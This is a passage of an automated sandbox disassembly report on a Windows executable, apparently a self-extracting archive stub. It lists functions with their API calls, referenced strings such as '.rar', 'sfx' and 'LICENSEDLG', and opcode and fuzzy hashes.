Instruction Fuzzy Hash: 4D21AF76900218FFCF129FA1CC48DDEBFBAFB49350B104466F914A2120C7369A65EFA4

Function 0041E414 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 57libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,0042D828,0000000C,0041E54F,00000000,00000000,?,0041FA38,0041A53A,00000456,?,?,0041A53A,00000000,?), ref: 0041E426
__crt_waiting_on_module_handle.LIBCMT ref: 0041E431

Part of subcall function 00421025: Sleep.KERNEL32(000003E8,00000000,?,0041E377,KERNEL32.DLL,?,0041E3C3,?,0041FA38,0041A53A,00000456,?,?,0041A53A,00000000,?), ref: 00421031
Part of subcall function 00421025: GetModuleHandleW.KERNEL32(00000000,?,0041E377,KERNEL32.DLL,?,0041E3C3,?,0041FA38,0041A53A,00000456,?,?,0041A53A,00000000,?), ref: 0042103A

GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 0041E45A
GetProcAddress.KERNEL32(0041A53A,DecodePointer), ref: 0041E46A
__lock.LIBCMT ref: 0041E48C
InterlockedIncrement.KERNEL32(?), ref: 0041E499
__lock.LIBCMT ref: 0041E4AD
___addlocaleref.LIBCMT ref: 0041E4CB

Strings

KERNEL32.DLL, xrefs: 0041E420, 0041E425, 0041E430
EncodePointer, xrefs: 0041E44E
DecodePointer, xrefs: 0041E462

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
String ID: DecodePointer$EncodePointer$KERNEL32.DLL
API String ID: 1028249917-2843748187
Opcode ID: 9635beca641f941a5cf41b771aad4b1ee68b70dcc45c0ba52da07d90b48f8134
Instruction ID: 7af8a4376d65894476f30e00cb8ebc38930f36a8ac0c67b7d335555c403a5827
Opcode Fuzzy Hash: 9635beca641f941a5cf41b771aad4b1ee68b70dcc45c0ba52da07d90b48f8134
Instruction Fuzzy Hash: BA11C371A00700DFD720AF36A805B8AB7F0AF04714F90452FE8A9962A0CB78A9818F5D

Function 0040EDAC Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 260COMMON

Download Yara Rule

APIs

_wcscpy.LIBCMT ref: 0040EE3C
_wcscpy.LIBCMT ref: 0040EE5B
_wcschr.LIBCMT ref: 0040EE69
_wcscpy.LIBCMT ref: 0040EE89
_wcscpy.LIBCMT ref: 0040EF13
_wcscpy.LIBCMT ref: 0040EFCB
_wcscpy.LIBCMT ref: 0040F048

Part of subcall function 00410792: _wcsncpy.LIBCMT ref: 004107A9

SHChangeNotify.SHELL32(00001000,00000005,00000000,00000000), ref: 0040F0DA

Strings

", xrefs: 0040EE41
.lnk, xrefs: 0040F00B, 0040F01B

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: _wcscpy$ChangeNotify_wcschr_wcsncpy
String ID: "$.lnk
API String ID: 1911921660-4024015082
Opcode ID: e651489dc2a5b0bb9b6c615014c869a8b32f12ac8fb9b98e25601d87d8d9f970
Instruction ID: 88c4415a075e01d6f651a60111bdb9063bf49f61dcbf6232d0e2daea2c36e0a6
Opcode Fuzzy Hash: e651489dc2a5b0bb9b6c615014c869a8b32f12ac8fb9b98e25601d87d8d9f970
Instruction Fuzzy Hash: 7191377280022D99DF25DB91CC45EEE737CBF04304F4445ABE609F7191EB789AE48B59

Function 0040EBB3 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 131windowCOMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(?,?), ref: 0040EBD0

Part of subcall function 00409E72: _wcslen.LIBCMT ref: 00409E78
Part of subcall function 00409E72: _wcscat.LIBCMT ref: 00409E97

_swprintf.LIBCMT ref: 0040EC0C

Part of subcall function 00401B7B: __vswprintf_c_l.LIBCMT ref: 00401B8E

SetDlgItemTextW.USER32(?,00000066,?), ref: 0040EC2E
_wcschr.LIBCMT ref: 0040EC61
_wcscpy.LIBCMT ref: 0040ECA5
_wcscpy.LIBCMT ref: 0040ECCE
_wcscpy.LIBCMT ref: 0040ECE1
MessageBoxW.USER32 ref: 0040ED11
EndDialog.USER32 ref: 0040ED33

Strings

%s%s%d, xrefs: 0040EBE9, 0040EC03

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: _wcscpy$DialogItemMessagePathTempText__vswprintf_c_l_swprintf_wcscat_wcschr_wcslen
String ID: %s%s%d
API String ID: 1897388972-1000756122
Opcode ID: b6a4a87ef34ec1b45c318ed0c0aca1b65bec44bf2238a5088107fa152e5bf229
Instruction ID: 04ed6288bfb4fe1012f448e4c012fb7827b25eb2883d7eaa30f1b490a74f43c8
Opcode Fuzzy Hash: b6a4a87ef34ec1b45c318ed0c0aca1b65bec44bf2238a5088107fa152e5bf229
Instruction Fuzzy Hash: A95186B180011D9BDB31DFA1DC44BEE77B8BB04308F4445BBE709A3191E7799AA88F59

Function 00418D56 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 93COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00418D61
_malloc.LIBCMT ref: 00418D6F

Part of subcall function 0041CAFE: __FF_MSGBANNER.LIBCMT ref: 0041CB21
Part of subcall function 0041CAFE: __NMSG_WRITE.LIBCMT ref: 0041CB28
Part of subcall function 0041CAFE: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,00420EB4,00000000,00000001,00000000,?,0041EAED,00000018,0042D8B8,0000000C,0041EB7E), ref: 0041CB75

_wcscpy.LIBCMT ref: 00418D8D
_wcslen.LIBCMT ref: 00418D93
_wcscpy.LIBCMT ref: 00418DDB

Strings

 , xrefs: 00418E10
<style>body{font-family:"Arial";font-size:12;}</style>, xrefs: 00418D87
<br>, xrefs: 00418DD3
, xrefs: 00418DAB

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: _wcscpy_wcslen$AllocateHeap_malloc
String ID: $ $<br>$<style>body{font-family:"Arial";font-size:12;}</style>
API String ID: 2405444336-406990186
Opcode ID: 047b849221587149d1c809552d3ca53d6844a505f5caf9e1d03e76e0d3ca8787
Instruction ID: 8966a9ceef134e5579ac3cbe6638699c3ba27447775194bb76ca040d1bbf1e8b
Opcode Fuzzy Hash: 047b849221587149d1c809552d3ca53d6844a505f5caf9e1d03e76e0d3ca8787
Instruction Fuzzy Hash: 6B210672940304ABCB21AB54EC41ADAB3F5DF51324B60401FE840A7290FBBCA9E2839D

Function 0040F165 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 96windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000080,00000001,?), ref: 0040F1CE
SendDlgItemMessageW.USER32 ref: 0040F1E3
GetDlgItem.USER32(?,00000065), ref: 0040F1F2
SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0040F207
GetSysColor.USER32 ref: 0040F20B
SendMessageW.USER32(?,00000443,00000000,00000000), ref: 0040F21B
SetForegroundWindow.USER32(?), ref: 0040F235
EndDialog.USER32 ref: 0040F268

Strings

LICENSEDLG, xrefs: 0040F171

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: MessageSend$Item$ColorDialogForegroundWindow
String ID: LICENSEDLG
API String ID: 3794146707-2177901306
Opcode ID: 2cb0723f7b33f9d8d75f046d90bb2c95cd2bca76ddac3c5dd686a1da91d84a55
Instruction ID: 9a1c6c6675b17edfd38f15777834aa28e592285d7dadef32eb4c47eea7442a16
Opcode Fuzzy Hash: 2cb0723f7b33f9d8d75f046d90bb2c95cd2bca76ddac3c5dd686a1da91d84a55
Instruction Fuzzy Hash: B821F775200204BBDB316F71DC49E6B3B6DEB85B04F44843AFA01B91E1CA7A8865C72C

Function 0040D8B2 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 82windowCOMMON

Download Yara Rule

APIs

GetWindow.USER32 ref: 0040D8D2
GetClassNameW.USER32(00000000,?,00000800), ref: 0040D90B

Part of subcall function 004119E6: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,00000000,000000FF,00409A30,?,00000000,?,00409B4A,00000000,-00000002,?,00000000,?), ref: 004119FC

GetWindowLongW.USER32(00000000,000000F0), ref: 0040D929
SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0040D940
GetObjectW.GDI32(00000000,00000018,?), ref: 0040D94F

Part of subcall function 00419991: GetDC.USER32 ref: 0041999D
Part of subcall function 00419991: GetDeviceCaps.GDI32 ref: 004199AC
Part of subcall function 00419991: ReleaseDC.USER32(00000000,00000000), ref: 004199BA

Part of subcall function 0041994E: GetDC.USER32 ref: 0041995A
Part of subcall function 0041994E: GetDeviceCaps.GDI32 ref: 00419969
Part of subcall function 0041994E: ReleaseDC.USER32(00000000,00000000), ref: 00419977

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040D976
DeleteObject.GDI32(00000000), ref: 0040D981
GetWindow.USER32 ref: 0040D98A

Strings

STATIC, xrefs: 0040D911

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: Window$CapsDeviceMessageObjectReleaseSend$ClassCompareDeleteLongNameString
String ID: STATIC
API String ID: 1444658586-1882779555
Opcode ID: 37f02244363c2bac29c587b5d647983de08baeacb70688975e51277d0c121b08
Instruction ID: 3f053e9a2ee5e0753692044c6e411b0afb2163fc9e2c173e0114d5fe7951901a
Opcode Fuzzy Hash: 37f02244363c2bac29c587b5d647983de08baeacb70688975e51277d0c121b08
Instruction Fuzzy Hash: B0219272A40204BBDB21AB94CC46FFE7778AB41B44F50403AFD04B61C1CB7C9D469AAD

Function 0040BC10 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 133COMMONLIBRARYCODE

Download Yara Rule

APIs

_strlen.LIBCMT ref: 0040BC7F
_strlen.LIBCMT ref: 0040BCB0
_swprintf.LIBCMT ref: 0040BCD2
_wcschr.LIBCMT ref: 0040BCF7
_wcsncpy.LIBCMT ref: 0040BD2B
_wcsrchr.LIBCMT ref: 0040BD3C
_wcscpy.LIBCMT ref: 0040BD5A

Strings

%08x, xrefs: 0040BCC7

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: _strlen$_swprintf_wcschr_wcscpy_wcsncpy_wcsrchr
String ID: %08x
API String ID: 3224783807-3682738293
Opcode ID: 669695b007ae7977ae68f94f527ff9cdf8073c48786e5d668692956bf2e61faa
Instruction ID: e58a7be8b996571638b2f6ad1ec06a3e3d381d83aac2c50ffb90b6f1b6e38a26
Opcode Fuzzy Hash: 669695b007ae7977ae68f94f527ff9cdf8073c48786e5d668692956bf2e61faa
Instruction Fuzzy Hash: B041C4326042196BEB24AA64DC46BFB73ACDF40354F14003BB905F62D1EB7CDD9086AE

Function 0040A3CE Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 119COMMON

Download Yara Rule

APIs

Part of subcall function 0040A297: _wcsrchr.LIBCMT ref: 0040A2AB

_wcslen.LIBCMT ref: 0040A404
_wcscpy.LIBCMT ref: 0040A439

Part of subcall function 004107BF: _wcslen.LIBCMT ref: 004107C5
Part of subcall function 004107BF: _wcsncat.LIBCMT ref: 004107DE

_wcslen.LIBCMT ref: 0040A479
_wcscpy.LIBCMT ref: 0040A4EB

Strings

.rar, xrefs: 0040A3E5
sfx, xrefs: 0040A424
exe, xrefs: 0040A415
rar, xrefs: 0040A433

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: _wcslen$_wcscpy$_wcsncat_wcsrchr
String ID: .rar$exe$rar$sfx
API String ID: 1023950463-630704357
Opcode ID: 00170f72afe64c2a8883e9400a74dbf0f9430e1a688d6dfe7c4028d913cd7223
Instruction ID: 866274af749d2a12121155e11c715926870452bfbd3b748d7250beec9a0375e5
Opcode Fuzzy Hash: 00170f72afe64c2a8883e9400a74dbf0f9430e1a688d6dfe7c4028d913cd7223
Instruction Fuzzy Hash: 46312B2510432156D325AB219849ABB63989F11758B60983FFC82BB1D2E7FC9CF1D26F

Function 004191B9 Relevance: 13.6, APIs: 9, Instructions: 133windowCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 004191D2
GetTickCount.KERNEL32 ref: 004191ED
PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00419201
GetMessageW.USER32 ref: 00419212
TranslateMessage.USER32(?), ref: 0041921C
DispatchMessageW.USER32(?), ref: 00419226
SetWindowPos.USER32(?,00000001,00000000,00000000,00000000,00000000,00000204,?), ref: 004192C6
ShowWindow.USER32(?,00000005), ref: 004192D1
SetWindowTextW.USER32(?,00000000), ref: 004192DB

Part of subcall function 0041A086: __lock.LIBCMT ref: 0041A0A4
Part of subcall function 0041A086: ___sbh_find_block.LIBCMT ref: 0041A0AF
Part of subcall function 0041A086: ___sbh_free_block.LIBCMT ref: 0041A0BE
Part of subcall function 0041A086: RtlFreeHeap.NTDLL(00000000,00000000,0042D5E0,0000000C,0041EB44,00000000,0042D8B8,0000000C,0041EB7E,00000000,0041A52B,?,00425008,00000004,0042DAA0,0000000C), ref: 0041A0EE
Part of subcall function 0041A086: GetLastError.KERNEL32(?,00425008,00000004,0042DAA0,0000000C,00420EFE,00000000,0041A53A,00000000,00000000,00000000,?,0041E526,00000001,00000214), ref: 0041A0FF

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: Message$Window$CountTick$DispatchErrorFreeHeapLastPeekShowTextTranslate___sbh_find_block___sbh_free_block__lock
String ID:
API String ID: 1762286965-0
Opcode ID: 7ec913425a3f3e2372b1638400142b3106039a82b1169f5c7905f957281089fd
Instruction ID: d0124b5cfa2c812e1f5563f1aea717e10ae4c6884e62fce45702c6eeb0eaf713
Opcode Fuzzy Hash: 7ec913425a3f3e2372b1638400142b3106039a82b1169f5c7905f957281089fd
Instruction Fuzzy Hash: 1C414971A00219FFCB20DFA5C8888DEBBB9EF49755B10885AF805D7210C734DE81CBA5

Function 00408280 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 134fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00408285
GetLongPathNameW.KERNEL32 ref: 004082A8
GetShortPathNameW.KERNEL32 ref: 004082C7

Part of subcall function 0040A108: _wcslen.LIBCMT ref: 0040A10E

Part of subcall function 004119E6: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,00000000,000000FF,00409A30,?,00000000,?,00409B4A,00000000,-00000002,?,00000000,?), ref: 004119FC

_swprintf.LIBCMT ref: 0040835F

Part of subcall function 00401B7B: __vswprintf_c_l.LIBCMT ref: 00401B8E

MoveFileW.KERNEL32 ref: 004083CB
MoveFileW.KERNEL32 ref: 0040840E

Part of subcall function 00410792: _wcsncpy.LIBCMT ref: 004107A9

Strings

rtmp%d, xrefs: 0040834C

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen_wcsncpy
String ID: rtmp%d
API String ID: 506780119-3303766350
Opcode ID: 80432a155c85dd19641fc11820cc5f36f4e74055db2c5ac48604e141677261b6
Instruction ID: d2d8fbff6cc24eb45d5551c3de5ba499806f7c616db77afc3440ff76d91260fd
Opcode Fuzzy Hash: 80432a155c85dd19641fc11820cc5f36f4e74055db2c5ac48604e141677261b6
Instruction Fuzzy Hash: 17417D71901229A6CF20EB61CE45EDF777CAF01384F4044BBB585B7192EB7C9B85CA68

Function 0040A52D Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 63COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 0040A554

Part of subcall function 00401B7B: __vswprintf_c_l.LIBCMT ref: 00401B8E

_wcschr.LIBCMT ref: 0040A572
_wcschr.LIBCMT ref: 0040A582
_wcsncpy.LIBCMT ref: 0040A5A8

Strings

%s.%d.tmp, xrefs: 0040A532
%c:\, xrefs: 0040A54A

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: _wcschr$__vswprintf_c_l_swprintf_wcsncpy
String ID: %c:\$%s.%d.tmp
API String ID: 2474501127-1021493711
Opcode ID: d9a52ac475c9474a243f4b8a9bff4ce4a73f60a829f840133cf38701409695cc
Instruction ID: c273d68f1ac1a5b69313dd0e580a3be66827efeb0eddacf25e0c0d309c5cb35b
Opcode Fuzzy Hash: d9a52ac475c9474a243f4b8a9bff4ce4a73f60a829f840133cf38701409695cc
Instruction Fuzzy Hash: 8501D623254311B9D620AB769C46D6B73BCEFC9361750483FF884E71C1EA38D4A5827B

Function 00418E4E Relevance: 12.1, APIs: 8, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00418E60
GetTickCount.KERNEL32 ref: 00418E65
PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00418E94
TranslateMessage.USER32(?), ref: 00418EA2
DispatchMessageW.USER32(?), ref: 00418EAC
GetMessageW.USER32 ref: 00418EB9
GetTickCount.KERNEL32 ref: 00418EBF
VariantInit.OLEAUT32(?), ref: 00418ECC

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: Message$CountTick$DispatchInitPeekTranslateVariant
String ID:
API String ID: 4242828014-0
Opcode ID: 24f8551c6bace4c49b29b4d161595cc50716ae70862bc317294abf2e64a79673
Instruction ID: a43002fd53ce858f03131fbfb0a663e78a11023b27f2934e49aeb3ca8e517cdc
Opcode Fuzzy Hash: 24f8551c6bace4c49b29b4d161595cc50716ae70862bc317294abf2e64a79673
Instruction Fuzzy Hash: 9D21E871E00208AFDB10DFE4D888DEEBBBCEF48245F54486AF501E7250D6759A45CB65

Function 00418FFB Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 157COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00419007
_malloc.LIBCMT ref: 00419011

Part of subcall function 0041CAFE: __FF_MSGBANNER.LIBCMT ref: 0041CB21
Part of subcall function 0041CAFE: __NMSG_WRITE.LIBCMT ref: 0041CB28
Part of subcall function 0041CAFE: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,00420EB4,00000000,00000001,00000000,?,0041EAED,00000018,0042D8B8,0000000C,0041EB7E), ref: 0041CB75

Strings

</p>, xrefs: 004190C7
</style>, xrefs: 00419131
<br>, xrefs: 004190DE
<style>, xrefs: 00419116

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: AllocateHeap_malloc_wcslen
String ID: </p>$</style>$<br>$<style>
API String ID: 4208083856-1200123991
Opcode ID: e047901aca8098468097dccee60e958851f15d5b14811d4fc752e491ccb93117
Instruction ID: bc0ed6908f7da2a61cf52ceaa21b11de33c8c296790c6dc460781c596d89ce32
Opcode Fuzzy Hash: e047901aca8098468097dccee60e958851f15d5b14811d4fc752e491ccb93117
Instruction Fuzzy Hash: 57410639641353A5EB305B298821BF777A4DF09754F28401BEDC1A72C1E7AC4DC2825E

Function 0040D61E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 0040D632

Part of subcall function 0041CAFE: __FF_MSGBANNER.LIBCMT ref: 0041CB21
Part of subcall function 0041CAFE: __NMSG_WRITE.LIBCMT ref: 0041CB28
Part of subcall function 0041CAFE: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,00420EB4,00000000,00000001,00000000,?,0041EAED,00000018,0042D8B8,0000000C,0041EB7E), ref: 0041CB75

_wcslen.LIBCMT ref: 0040D672
_wcscat.LIBCMT ref: 0040D689
_wcslen.LIBCMT ref: 0040D68F
_wcscpy.LIBCMT ref: 0040D6BD

Strings

}, xrefs: 0040D661

Memory Dump Source

